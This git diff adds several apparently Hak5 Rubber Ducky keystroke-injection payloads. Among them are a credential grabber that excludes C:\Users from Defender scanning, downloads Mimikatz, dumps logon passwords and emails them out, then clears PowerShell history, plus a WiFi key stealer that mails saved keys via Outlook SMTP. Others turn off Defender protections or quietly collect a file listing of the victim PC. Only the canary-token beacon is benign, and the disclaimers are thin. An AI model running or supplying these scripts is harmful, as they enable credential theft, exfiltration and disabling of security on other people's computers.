Merge remote-tracking branch 'upstream/master'

payloads/library/credentials/Simple_User_Password_Grabber/payload.txt

@@ -0,0 +1,96 @@
+REM Title: windows password grabber
+REM Arthor makozort, https://github.com/makozort
+REM Target: windows 10 (with admin access), might work with windows 7 idk
+REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NO LIABLE FOR ANY MISUSE OF THIS SCRIPT
+REM --------------set default delay based on targets computer speed, 350 is around mid range (I think)
+DEFAULT_DELAY 350
+REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard"
+DELAY 1000
+REM ------------open powershell as admin and set an exclusion path in the C:\Users path
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING Set-MpPreference -ExclusionPath C:\Users
+ENTER
+STRING exit
+ENTER
+REM -------------download mimikatz
+GUI r
+STRING cmd
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
+ENTER
+REM ------------run the following mimikatz commands and print results in new txt file
+DELAY 4000
+STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
+ENTER 
+STRING privilege::debug
+ENTER
+STRING sekurlsa::logonPasswords full
+ENTER
+STRING exit
+ENTER
+REM< --------- delete mimikatz
+STRING del %TEMP%\pw.exe
+ENTER
+STRING exit
+ENTER
+REM -------------email the pwlog.txt to your email
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING Remove-MpPreference -ExclusionPath C:\Users
+ENTER
+STRING $SMTPServer = 'smtp.gmail.com'
+ENTER
+STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+ENTER
+STRING $SMTPInfo.EnableSsl = $true
+ENTER
+STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com', 'PASSWORDHERE');
+ENTER
+STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
+ENTER
+STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com'
+ENTER
+STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com')
+ENTER
+STRING $ReportEmail.Subject = 'Hello from the ducky'
+ENTER
+STRING $ReportEmail.Body = 'Attached is your duck report.' 
+ENTER
+STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
+ENTER
+STRING $SMTPInfo.Send($ReportEmail)
+ENTER
+DELAY 4000
+STRING exit
+ENTER
+REM ------cleanup time
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+REM ----------delete the txt file
+STRING del c:\pwlog.txt
+ENTER
+REM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations
+STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
+ENTER
+STRING exit
+ENTER
+REM ------lock the pc
+GUI l

payloads/library/exfiltration/DUCKY-WIFI_GRABER/payload.txt

@@ -0,0 +1,86 @@
+REM Title:         Ducky WiFi Grabber
+REM Description:   Steals wifi passwords and sends them to your outlook email
+REM Author:        Zero_Sploit
+REM Props:         Hak5 Team
+REM Version:       1.0
+REM Category:      Exfiltration
+REM Target:        Windows 10 (CMD + Powershell)
+REM Attackmodes:   HID
+REM Some editing on your part is needed such as outlook email & password
+REM This script is for educational purposes only please do not use this for malicious purposes
+REM Open Cmd
+DELAY 1000
+WINDOWS r
+DELAY 500
+STRING cmd
+ENTER
+DELAY 200
+REM Get all SSID
+STRING cd %USERPROFILE% & netsh wlan show profiles | findstr "All" > a.txt
+ENTER
+REM Create a filter.bat to get all the profile names
+STRING echo SETLOCAL EnableDelayedExpansion^
+ENTER
+ENTER
+STRING for /f "tokens=5*" %%i in (a.txt) do (^
+ENTER
+ENTER
+STRING set val=%%i %%j^
+ENTER
+ENTER
+STRING if "!val:~-1!" == " " set val=!val:~0,-1!^
+ENTER
+ENTER
+STRING echo !val!^>^>b.txt) > filter.bat
+ENTER
+REM Run filter.bat and save all profile names in b.txt
+STRING filter.bat
+DELAY 300
+ENTER
+REM --> Save all the LOOT in Log.txt and delete the other files
+STRING (for /f "tokens=*" %i in (b.txt) do @echo     SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:"Key Content" & echo.) > Log.txt
+ENTER
+DELAY 1000
+STRING exit
+DELAY 500
+ENTER
+DELAY 1000
+REM Mail Log.txt
+WINDOWS r
+DELAY 500
+STRING powershell
+ENTER
+DELAY 1000
+STRING del .\a.txt 
+ENTER
+STRING del .\b.txt 
+ENTER
+STRING del .\filter.bat
+ENTER
+REM Email The Log.txt file
+STRING $SMTPServer = 'smtp-mail.outlook.com'
+ENTER
+STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+ENTER
+STRING $SMTPInfo.EnableSSL = $true
+ENTER
+STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('YOUR EMAIL HERE', 'YOUR EMAIL PASSWORD HERE')
+ENTER
+STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
+ENTER
+STRING $ReportEmail.From = 'YOUR EMAIL HERE'
+ENTER
+STRING $ReportEmail.To.Add('YOUR EAMIL HERE')
+ENTER
+STRING $ReportEmail.Subject = 'WiFi key grabber'
+ENTER
+STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
+ENTER
+STRING $SMTPInfo.Send($ReportEmail)
+ENTER
+REM Delete Log.txt and exit
+DELAY 3000
+STRING del Log.txt
+DELAY 500
+STRING exit
+ENTER

payloads/library/general/Canary_Duck/payload.txt

@@ -0,0 +1,19 @@
+# Title:        Canary Duck
+# Description:   Opens hidden powershell and connects to canary webserver using Invoke-WebRequest alerting you to spies and snoops.
+# Author:        Jessie Crimson Hart
+# Props:         Hak5, Thinkst
+# Version:       1.0
+# Category:      General
+# Target:        Windows 10 (Powershell)
+# Attackmodes:   HID
+DELAY 1000
+GUI r
+DELAY 100
+REM Run a hidden powershell
+STRING powershell -windowstyle hidden
+ENTER
+REM make sure powershell is open by waiting for 1 second.
+DELAY 1000
+REM Open IE and connect to canary site. Replace the URL with the URL of your canary token from http://canarytokens.com
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass Invoke-WebRequest "[CANARY URL HERE]"
+ENTER

payloads/library/general/Disable_Windows_Defender/payload.txt

@@ -0,0 +1,52 @@
+REM Title:         Disable_Windows10_Defender
+REM Description    Disable Windows Defender and Tamper protection on Windows 10
+REM Author:        Zero_Sploit
+REM Props:         Hak5 Team
+REM Version:       1.0
+REM Target:        Windows 10
+REM Attackmodes:   HID
+DELAY 1000
+REM Open Windows Defender Settings
+CTRL ESC
+DELAY 1000
+STRING windows security
+DELAY 500
+ENTER
+DELAY 500
+ENTER
+REM Navigate to Manage Settings then turn off Tamper Protection && Realtime Protection
+DOWN
+DOWN
+DOWN
+DOWN
+ENTER
+DELAY 500
+TAB
+TAB
+TAB
+TAB
+DELAY 500
+SHIFT SPACE
+DELAY 1000
+ALT y
+DELAY 500
+ALT F4
+DELAY 1000
+CTRL ESC
+DELAY 1000
+STRING windows security
+DELAY 500
+ENTER
+DELAY 500
+ENTER
+DOWN
+DOWN
+DOWN
+DOWN
+ENTER
+DELAY 500
+SHIFT SPACE
+DELAY 500
+ALT y
+DELAY 500
+ALT F4

payloads/library/general/Hotfix_Warning/payload.txt

@@ -0,0 +1,27 @@
+
+# Title:         List Hotfixes and Warning Message            
+# Description:   List Hotfixes on a Windows Machine and then prints message of warning to the unsuspecting Victim
+# Author:        John Fawcett
+# Version:       1.1
+# Category:      General
+# Target:        Windows 10 (CMD)
+# Attackmodes:   HID
+
+
+#######Stage 1 Open CMD AND Get Hotfixes#########
+
+REM Open cmd
+DELAY 2000
+GUI r
+DELAY 2000
+STRING cmd
+DELAY 500
+ENTER
+DELAY 500
+STRING wmic qfe
+ENTER
+
+###### Stage 2 Print Message#######
+
+DELAY 1000
+STRING CONGRATULATIONS, YOU HAVE BEEN HACKED!!!!

payloads/library/recon/Tree_of_Knowledge/payload.txt

@@ -0,0 +1,13 @@
+REM Payload created by Alex007-CyberGuy
+REM Check the readme.md file for more info on the payload and what is does.
+DEFAULTDELAY 250
+DELAY 3000
+GUI r
+DELAY 400
+STRING cmd /k "mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr "USB"') do set myd=%d&echo tree /a /f > echotree.cmd"
+ENTER
+DELAY 350
+STRING echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit
+ENTER
+ALT SPACE
+STRING n

payloads/library/recon/Tree_of_Knowledge/readme.md

@@ -0,0 +1,26 @@
+# Tree of Knowledge
+
+## Intro
+This payload copies the names of all the files on a victim's PC, then puts them on a file on the root of the ducky.
+In order to remove suspicion, the ducky also automatically hides the gathered recon info so that it can only be seen when the batch file is run.
+This whole process is relatively discreet, bug free and can run and finish in a matter of seconds.
+This payload is great for the first phase of a Pen Test, since it effortlessly shows you the contents of a victim's PC, which can then later be used for an "involuntary backup".
+
+## Requirements:
+- Only works on Windows (7/8/8.1/10)
+- Twin Duck firmware must be loaded
+- The ducky must be labeled as "USB"
+
+## Viewing files
+In order to view the gathered recon file(s), simply put the show.bat program onto the root of the ducky and run it.
+
+## Troubleshooting
+1. Experiment with those delays.
+2. Make sure that you don't already have a recon file saved from that computer.
+3. ALT SPACE doesn't work on some encoders. Try using the java based encoder.
+
+### Tip
+The inject.bin still works even if it is marked as "hidden".
+
+That's it folks!
+I spent quite long in order optimise this payload, so enjoy!

payloads/library/recon/Tree_of_Knowledge/show.bat

@@ -0,0 +1,2 @@
+echo off:
+attrib *.txt -h /s /d